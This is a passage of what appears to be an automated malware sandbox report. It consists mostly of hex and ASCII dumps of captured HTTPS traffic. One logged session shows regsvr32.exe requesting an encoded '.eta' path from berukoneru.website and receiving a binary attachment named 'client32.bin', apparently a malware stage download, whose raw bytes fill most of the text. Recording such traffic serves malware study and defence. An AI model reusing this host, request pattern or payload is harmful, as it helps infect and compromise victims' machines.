da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                        Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                        2021-12-14 09:34:08 UTC1406INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                        Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                        2021-12-14 09:34:08 UTC1422INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                        Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                        2021-12-14 09:34:08 UTC1566INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                        Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                        2021-12-14 09:34:08 UTC1598INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                        Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                        2021-12-14 09:34:08 UTC1614INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                        Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                        2021-12-14 09:34:08 UTC1630INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                        Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                        2021-12-14 09:34:08 UTC1678INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                        Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                        2021-12-14 09:34:08 UTC1694INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                        Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        6192.168.2.54980179.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-14 09:34:07 UTC1101OUTGET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:08 UTC1134INHTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:07 GMT
                        Content-Type: application/zip
                        Content-Length: 268426
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=brv6hst5is03pld8n10nk7l6i7; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:08 UTC1134INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                        Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                        2021-12-14 09:34:08 UTC1150INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                        Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                        2021-12-14 09:34:08 UTC1246INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                        Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                        2021-12-14 09:34:08 UTC1262INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                        Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                        2021-12-14 09:34:08 UTC1278INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                        Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                        2021-12-14 09:34:08 UTC1438INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                        Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                        2021-12-14 09:34:08 UTC1454INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                        Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                        2021-12-14 09:34:08 UTC1470INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                        Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                        2021-12-14 09:34:08 UTC1486INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                        Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                        2021-12-14 09:34:08 UTC1502INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                        Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                        2021-12-14 09:34:08 UTC1518INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 